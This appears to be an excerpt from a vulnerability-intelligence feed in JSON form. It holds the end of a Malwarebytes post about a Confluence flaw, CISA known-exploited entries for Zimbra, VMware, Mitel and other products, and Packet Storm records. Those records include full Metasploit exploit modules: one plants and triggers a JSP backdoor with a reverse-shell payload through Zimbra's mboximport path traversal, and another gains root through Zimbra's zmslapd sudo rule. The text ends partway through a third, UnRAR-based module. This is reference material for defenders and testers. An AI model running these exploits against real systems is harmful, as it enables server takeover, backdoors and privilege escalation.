This means it is hosted by Atlassian and is not vulnerable.\n\nWe will keep you posted about the developments, so stay tuned.\n\n## Update June 3, 2022\n\nAtlassian has released versions 7.4.17, 7.13.7, 7.14.3, 7.15.2, 7.16.4, 7.17.4 and 7.18.1 which contain a fix for this issue.\n\n**What You Need to Do**\n\nAtlassian recommends that you upgrade to the latest Long Term Support release. For a full description of the latest version, see the [Confluence Server and Data Center Release Notes](<https://confluence.atlassian.com/doc/confluence-release-notes-327.html>). You can download the latest version from the [download centre](<https://www.atlassian.com/software/confluence/download-archives>).\n\nThe post [[updated]Unpatched Atlassian Confluence vulnerability is actively exploited](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2022/06/unpatched-atlassian-confluence-vulnerability-is-actively-exploited/>) appeared first on [Malwarebytes Labs](<https://blog.malwarebytes.com>).", "cvss3": {}, "published": "2022-06-03T14:41:58", "type": "malwarebytes", "title": "[updated]Unpatched Atlassian Confluence vulnerability is actively exploited", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2022-26134"], "modified": "2022-06-03T14:41:58", "id": "MALWAREBYTES:CA300551E02DA3FFA4255FBA0359A555", "href": "https://blog.malwarebytes.com/exploits-and-vulnerabilities/2022/06/unpatched-atlassian-confluence-vulnerability-is-actively-exploited/", "cvss": {"score": 0.0, "vector": "NONE"}}], "cisa_kev": [{"lastseen": "2023-06-03T15:24:43", "description": "Zimbra Collaboration (ZCS) contains flaw in the mboximport functionality, allowing an authenticated attacker to upload arbitrary files to perform remote code execution. 
This vulnerability was chained with CVE-2022-37042 which allows for unauthenticated remote code execution.", "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "HIGH", "baseScore": 7.2, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-08-11T00:00:00", "type": "cisa_kev", "title": "Zimbra Collaboration (ZCS) Arbitrary File Upload Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-27925", "CVE-2022-37042"], "modified": "2022-08-11T00:00:00", "id": "CISA-KEV-CVE-2022-27925", "href": "", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2023-06-03T15:24:43", "description": "Zimbra Collaboration (ZCS) contains an authentication bypass vulnerability in MailboxImportServlet. 
This vulnerability was chained with CVE-2022-27925 which allows for unauthenticated remote code execution.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-08-11T00:00:00", "type": "cisa_kev", "title": "Zimbra Collaboration (ZCS) Authentication Bypass Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-27925", "CVE-2022-37042"], "modified": "2022-08-11T00:00:00", "id": "CISA-KEV-CVE-2022-37042", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-06-03T15:24:43", "description": "The Service Appliance component in Mitel MiVoice Connect allows remote code execution due to incorrect data validation.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": 
"2022-06-27T00:00:00", "type": "cisa_kev", "title": "Mitel MiVoice Connect Data Validation Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-29499"], "modified": "2022-06-27T00:00:00", "id": "CISA-KEV-CVE-2022-29499", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-06-06T15:41:25", "description": "Atlassian Questions For Confluence App has hard-coded credentials, exposing the username and password in plaintext. A remote unauthenticated attacker can use these credentials to log into Confluence and access all content accessible to users in the confluence-users group.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-07-29T00:00:00", "type": "cisa_kev", "title": "Atlassian Questions For Confluence App Hard-coded Credentials Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", 
"integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-26138"], "modified": "2022-07-29T00:00:00", "id": "CISA-KEV-CVE-2022-26138", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-06-03T15:24:43", "description": "Zimbra Collaboration (ZCS) allows an attacker to inject memcache commands into a targeted instance which causes an overwrite of arbitrary cached entries.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2022-08-04T00:00:00", "type": "cisa_kev", "title": "Zimbra Collaboration (ZCS) Command Injection Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-27924"], "modified": "2022-08-04T00:00:00", "id": "CISA-KEV-CVE-2022-27924", "href": "", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2023-06-03T15:24:43", "description": "RARLAB UnRAR on Linux and UNIX contains a directory traversal vulnerability, 
allowing an attacker to write to files during an extract (unpack) operation.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2022-08-09T00:00:00", "type": "cisa_kev", "title": "RARLAB UnRAR Directory Traversal Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-30333"], "modified": "2022-08-09T00:00:00", "id": "CISA-KEV-CVE-2022-30333", "href": "", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2023-06-03T15:24:43", "description": "Multiple API endpoints of Atlassian Bitbucket Server and Data Center contain a command injection vulnerability where an attacker with access to a public Bitbucket repository, or with read permissions to a private one, can execute code by sending a malicious HTTP request.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": 
"3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-09-30T00:00:00", "type": "cisa_kev", "title": "Atlassian Bitbucket Server and Data Center Command Injection Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-36804"], "modified": "2022-09-30T00:00:00", "id": "CISA-KEV-CVE-2022-36804", "href": "", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2023-05-27T15:17:54", "description": "VMware vCenter Server contains a file upload vulnerability in the Analytics service that allows a user with network access to port 443 to execute code.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-11-03T00:00:00", "type": "cisa_kev", "title": "VMware vCenter Server File Upload Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": 
"AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-22005"], "modified": "2021-11-03T00:00:00", "id": "CISA-KEV-CVE-2021-22005", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-05-27T15:17:54", "description": "VMware vCenter Server vSphere Client contains a remote code execution vulnerability in a vCenter Server plugin which allows an attacker with network access to port 443 to execute commands with unrestricted privileges on the underlying operating system.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-11-03T00:00:00", "type": "cisa_kev", "title": "VMware vCenter Server Remote Code Execution Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21972"], "modified": "2021-11-03T00:00:00", "id": "CISA-KEV-CVE-2021-21972", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "packetstorm": [{"lastseen": "2022-08-24T13:30:03", "description": "", "cvss3": 
{"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-08-24T00:00:00", "type": "packetstorm", "title": "Zimbra Zip Path Traversal", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-27925", "CVE-2022-37042"], "modified": "2022-08-24T00:00:00", "id": "PACKETSTORM:168146", "href": "https://packetstormsecurity.com/files/168146/Zimbra-Zip-Path-Traversal.html", "sourceData": "`## \n# This module requires Metasploit: https://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nrequire 'rex/zip' \n \nclass MetasploitModule < Msf::Exploit::Remote \nRank = ExcellentRanking \n \ninclude Msf::Exploit::EXE \ninclude Msf::Exploit::Remote::HttpClient \ninclude Msf::Exploit::FileDropper \n \ndef initialize(info = {}) \nsuper( \nupdate_info( \ninfo, \n'Name' => 'Zip Path Traversal in Zimbra (mboximport) (CVE-2022-27925)', \n'Description' => %q{ \nThis module POSTs a ZIP file containing path traversal characters to \nthe administrator interface for Zimbra Collaboration Suite. If \nsuccessful, it plants a JSP-based backdoor within the web directory, then \nexecutes it. 
\n \nThe core vulnerability is a path-traversal issue in Zimbra Collaboration Suite's \nZIP implementation that can result in the extraction of an arbitrary file \nto an arbitrary location on the host. \n \nThis issue is exploitable on the following versions of Zimbra: \n \n* Zimbra Collaboration Suite Network Edition 9.0.0 Patch 23 (and earlier) \n* Zimbra Collaboration Suite Network Edition 8.8.15 Patch 30 (and earlier) \n \nNote that the Open Source Edition is not affected. \n}, \n'Author' => [ \n'Volexity Threat Research', # Initial writeup \n\"Yang_99's Nest\", # PoC \n'Ron Bowes', # Analysis / module \n], \n'License' => MSF_LICENSE, \n'References' => [ \n['CVE', '2022-27925'], \n['CVE', '2022-37042'], \n['URL', 'https://blog.zimbra.com/2022/03/new-zimbra-patches-9-0-0-patch-24-and-8-8-15-patch-31/'], \n['URL', 'https://www.cisa.gov/uscert/ncas/alerts/aa22-228a'], \n['URL', 'https://www.yang99.top/index.php/archives/82/'], \n['URL', 'https://wiki.zimbra.com/wiki/Zimbra_Releases/9.0.0/P24'], \n['URL', 'https://wiki.zimbra.com/wiki/Zimbra_Releases/8.8.15/P31'], \n], \n'Platform' => 'linux', \n'Arch' => [ARCH_X86, ARCH_X64], \n'Targets' => [ \n[ 'Zimbra Collaboration Suite', {} ] \n], \n'DefaultOptions' => { \n'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp', \n'TARGET_PATH' => '../../../../../../../../../../../../opt/zimbra/jetty_base/webapps/zimbraAdmin/public/', \n'TARGET_FILENAME' => nil, \n'RPORT' => 7071, \n'SSL' => true \n}, \n'DefaultTarget' => 0, \n'Privileged' => false, \n'DisclosureDate' => '2022-05-10', \n'Notes' => { \n'Stability' => [CRASH_SAFE], \n'Reliability' => [REPEATABLE_SESSION], \n'SideEffects' => [IOC_IN_LOGS] \n} \n) \n) \n \nregister_options( \n[ \nOptString.new('TARGET_PATH', [ true, 'The location the payload should extract to (can, and should, contain path traversal characters - \"../../\").']), \nOptString.new('TARGET_FILENAME', [ false, 'The filename to write in the target directory; should have a .jsp extension (default: 
<random>.jsp).']), \nOptString.new('TARGET_USERNAME', [ true, 'The target user, must be valid on the Zimbra server', 'admin']), \n] \n) \nend \n \n# Generate an on-system filename using datastore options \ndef generate_target_filename \nif datastore['TARGET_FILENAME'] && !datastore['TARGET_FILENAME'].end_with?('.jsp') \nprint_warning('TARGET_FILENAME does not end with .jsp, was that intentional?') \nend \n \nFile.join(datastore['TARGET_PATH'], datastore['TARGET_FILENAME'] || \"#{Rex::Text.rand_text_alpha_lower(4..10)}.jsp\") \nend \n \n# Normalize the path traversal and figure out where it is relative to the web root \ndef zimbra_get_public_path(target_filename) \n# Normalize the path \nnormalized_path = Pathname.new(File.join('/opt/zimbra/log', target_filename)).cleanpath \n \n# Figure out where it is, relative to the webroot \nwebroot = Pathname.new('/opt/zimbra/jetty_base/webapps/') \nrelative_path = normalized_path.relative_path_from(webroot) \n \n# Hopefully, we found a path from the webroot to the payload! \nif relative_path.to_s.start_with?('../') \nreturn nil \nend \n \nrelative_path \nend \n \ndef exploit \nprint_status('Encoding the payload as a .jsp file') \npayload = Msf::Util::EXE.to_jsp(generate_payload_exe) \n \n# Create a file \ntarget_filename = generate_target_filename \nprint_status(\"Target filename: #{target_filename}\") \n \n# Create a zip file \nzip = Rex::Zip::Archive.new \nzip.add_file(target_filename, payload) \ndata = zip.pack \n \nprint_status('Sending POST request with ZIP file') \nres = send_request_cgi( \n'method' => 'POST', \n'uri' => \"/service/extension/backup/mboximport?account-name=#{datastore['TARGET_USERNAME']}&ow=1&no-switch=1&append=1\", \n'data' => data \n) \n \n# Check the response \nif res.nil? 
\nfail_with(Failure::Unreachable, \"Could not connect to the target port (#{datastore['RPORT']})\") \nelsif res.code == 404 \nfail_with(Failure::NotFound, 'The target path was not found, target is probably not vulnerable') \nelsif res.code != 401 \nprint_warning(\"Unexpected response from the target (expected HTTP/401, got HTTP/#{res.code}) - exploit likely failed\") \nend \n \n# Get the public path for triggering the vulnerability, terminate if we \n# can't figure it out \npublic_filename = zimbra_get_public_path(target_filename) \nif public_filename.nil? \nfail_with(Failure::BadConfig, 'Could not determine the public web path, maybe you need to traverse further back?') \nend \n \nregister_file_for_cleanup(target_filename) \n \nprint_status(\"Trying to trigger the backdoor @ #{public_filename}\") \n \n# Trigger the backdoor \nres = send_request_cgi( \n'method' => 'GET', \n'uri' => normalize_uri(public_filename) \n) \n \nif res.nil? \nfail_with(Failure::Unreachable, 'Could not connect to trigger the payload') \nelsif res.code == 200 \nprint_good('Successfully triggered the payload') \nelsif res.code == 404 \nfail_with(Failure::Unknown, \"Payload was not uploaded, the server probably isn't vulnerable\") \nelse \nfail_with(Failure::Unknown, \"Could not connect to the server to trigger the payload: HTTP/#{res.code}\") \nend \nend \nend \n`\n", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}, "sourceHref": "https://packetstormsecurity.com/files/download/168146/zimbra_mboximport_cve_2022_27925.rb.txt"}, {"lastseen": "2022-08-10T16:46:08", "description": "", "cvss3": {}, "published": "2022-08-10T00:00:00", "type": "packetstorm", "title": "Zimbra zmslapd Privilege Escalation", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2022-37393"], "modified": "2022-08-10T00:00:00", "id": "PACKETSTORM:168048", "href": "https://packetstormsecurity.com/files/168048/Zimbra-zmslapd-Privilege-Escalation.html", "sourceData": "`## \n# This module requires 
Metasploit: https://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nclass MetasploitModule < Msf::Exploit::Local \nRank = ExcellentRanking \n \nprepend Msf::Exploit::Remote::AutoCheck \ninclude Msf::Post::Linux::Priv \ninclude Msf::Post::Linux::System \ninclude Msf::Post::Linux::Compile \ninclude Msf::Post::Linux::Kernel \ninclude Msf::Post::File \ninclude Msf::Exploit::EXE \ninclude Msf::Exploit::FileDropper \n \ndef initialize(info = {}) \nsuper( \nupdate_info( \ninfo, \n'Name' => 'Zimbra zmslapd arbitrary module load', \n'Description' => %q{ \nThis module exploits CVE-2022-37393, which is a vulnerability in \nZimbra's sudo configuration that permits the zimbra user to execute \nthe zmslapd binary as root with arbitrary parameters. As part of its \nintended functionality, zmslapd can load a user-defined configuration \nfile, which includes plugins in the form of .so files, which also \nexecute as root. \n}, \n'License' => MSF_LICENSE, \n'Author' => [ \n'Darren Martyn', # discovery and poc \n'Ron Bowes', # Module \n], \n'DisclosureDate' => '2021-10-27', \n'Platform' => [ 'linux' ], \n'Arch' => [ ARCH_X86, ARCH_X64 ], \n'SessionTypes' => [ 'shell', 'meterpreter' ], \n'Privileged' => true, \n'References' => [ \n[ 'CVE', '2022-37393' ], \n[ 'URL', 'https://darrenmartyn.ie/2021/10/27/zimbra-zmslapd-local-root-exploit/' ], \n], \n'Targets' => [ \n[ 'Auto', {} ], \n], \n'DefaultTarget' => 0, \n'Notes' => { \n'Reliability' => [ REPEATABLE_SESSION ], \n'Stability' => [ CRASH_SAFE ], \n'SideEffects' => [ IOC_IN_LOGS ] \n} \n) \n) \nregister_options [ \nOptString.new('SUDO_PATH', [ true, 'Path to sudo executable', 'sudo' ]), \nOptString.new('ZIMBRA_BASE', [ true, \"Zimbra's installation directory\", '/opt/zimbra' ]), \n] \nregister_advanced_options [ \nOptString.new('WritableDir', [ true, 'A directory where we can write files', '/tmp' ]) \n] \nend \n \n# Because this isn't patched, I can't say with 100% certainty that 
this will \n# detect a future patch (it depends on how they patch it) \ndef check \n# Sanity check \nif is_root? \nfail_with(Failure::None, 'Session already has root privileges') \nend \n \nunless file_exist?(\"#{datastore['ZIMBRA_BASE']}/libexec/zmslapd\") \nprint_error(\"zmslapd executable not detected: #{datastore['ZIMBRA_BASE']}/libexec/zmslapd (set ZIMBRA_BASE if Zimbra is installed in an unusual location)\") \nreturn CheckCode::Safe \nend \n \nunless command_exists?(datastore['SUDO_PATH']) \nprint_error(\"Could not find sudo: #{datastore['SUDOPATH']} (set SUDO_PATH if sudo isn't in $PATH)\") \nreturn CheckCode::Safe \nend \n \n# Run `sudo -n -l` to make sure we have access to the target command \ncmd = \"#{datastore['SUDO_PATH']} -n -l\" \nprint_status \"Executing: #{cmd}\" \noutput = cmd_exec(cmd).to_s \n \nif !output || output.start_with?('usage:') || output.include?('illegal option') || output.include?('a password is required') \nprint_error('Current user could not execute sudo -l') \nreturn CheckCode::Safe \nend \n \nif !output.include?(\"(root) NOPASSWD: #{datastore['ZIMBRA_BASE']}/libexec/zmslapd\") \nprint_error('Current user does not have access to run zmslapd') \nreturn CheckCode::Safe \nend \n \nCheckCode::Appears \nend \n \ndef exploit \nbase_dir = datastore['WritableDir'].to_s \nunless writable?(base_dir) \nfail_with(Failure::BadConfig, \"#{base_dir} is not writable\") \nend \n \n# Generate a random directory \nexploit_dir = \"#{base_dir}/.#{rand_text_alphanumeric(5..10)}\" \nif file_exist?(exploit_dir) \nfail_with(Failure::BadConfig, 'Exploit dir already exists') \nend \n \n# Create the directory and get ready to remove it \nprint_status(\"Creating exploit directory: #{exploit_dir}\") \nmkdir(exploit_dir) \nregister_dir_for_cleanup(exploit_dir) \n \n# Generate some filenames \nlibrary_name = \".#{rand_text_alphanumeric(5..10)}.so\" \nlibrary_path = \"#{exploit_dir}/#{library_name}\" \nconfig_name = \".#{rand_text_alphanumeric(5..10)}\" 
\nconfig_path = \"#{exploit_dir}/#{config_name}\" \n \n# Create the .conf file \nconfig = \"modulepath #{exploit_dir}\\nmoduleload #{library_name}\\n\" \nwrite_file(config_path, config) \n \nwrite_file(library_path, generate_payload_dll) \n \ncmd = \"sudo #{datastore['ZIMBRA_BASE']}/libexec/zmslapd -u root -g root -f #{config_path}\" \nprint_status \"Attempting to trigger payload: #{cmd}\" \nout = cmd_exec(cmd) \n \nunless session_created? \nprint_error(\"Failed to create session! Cmd output = #{out}\") \nend \nend \nend \n`\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://packetstormsecurity.com/files/download/168048/zimbra_slapper_priv_esc.rb.txt"}, {"lastseen": "2022-08-05T16:04:04", "description": "", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2022-08-05T00:00:00", "type": "packetstorm", "title": "Zimbra UnRAR Path Traversal", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-30333"], "modified": "2022-08-05T00:00:00", "id": "PACKETSTORM:167989", "href": "https://packetstormsecurity.com/files/167989/Zimbra-UnRAR-Path-Traversal.html", "sourceData": "`## \n# This module 
requires Metasploit: https://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nclass MetasploitModule < Msf::Exploit::Remote \nRank = ExcellentRanking \n \ninclude Msf::Exploit::FILEFORMAT \ninclude Msf::Exploit::EXE \ninclude Msf::Exploit::Remote::HttpClient \ninclude Msf::Exploit::FileDropper \ninclude Msf::Exploit::Format::RarSymlinkPathTraversal \n \ndef initialize(info = {}) \nsuper( \nupdate_info( \ninfo, \n'Name' => 'UnRAR Path Traversal in Zimbra (CVE-2022-30333)', \n'Description' => %q{ \nThis module creates a RAR file that can be emailed to a Zimbra server \nto exploit CVE-2022-30333. If successful, it plants a JSP-based \nbackdoor in the public web directory, then executes that backdoor. \n \nThe core vulnerability is a path-traversal issue in unRAR that can \nextract an arbitrary file to an arbitrary location on a Linux system. \n \nThis issue is exploitable on the following versions of Zimbra, provided \nUnRAR version 6.11 or earlier is installed: \n \n* Zimbra Collaboration 9.0.0 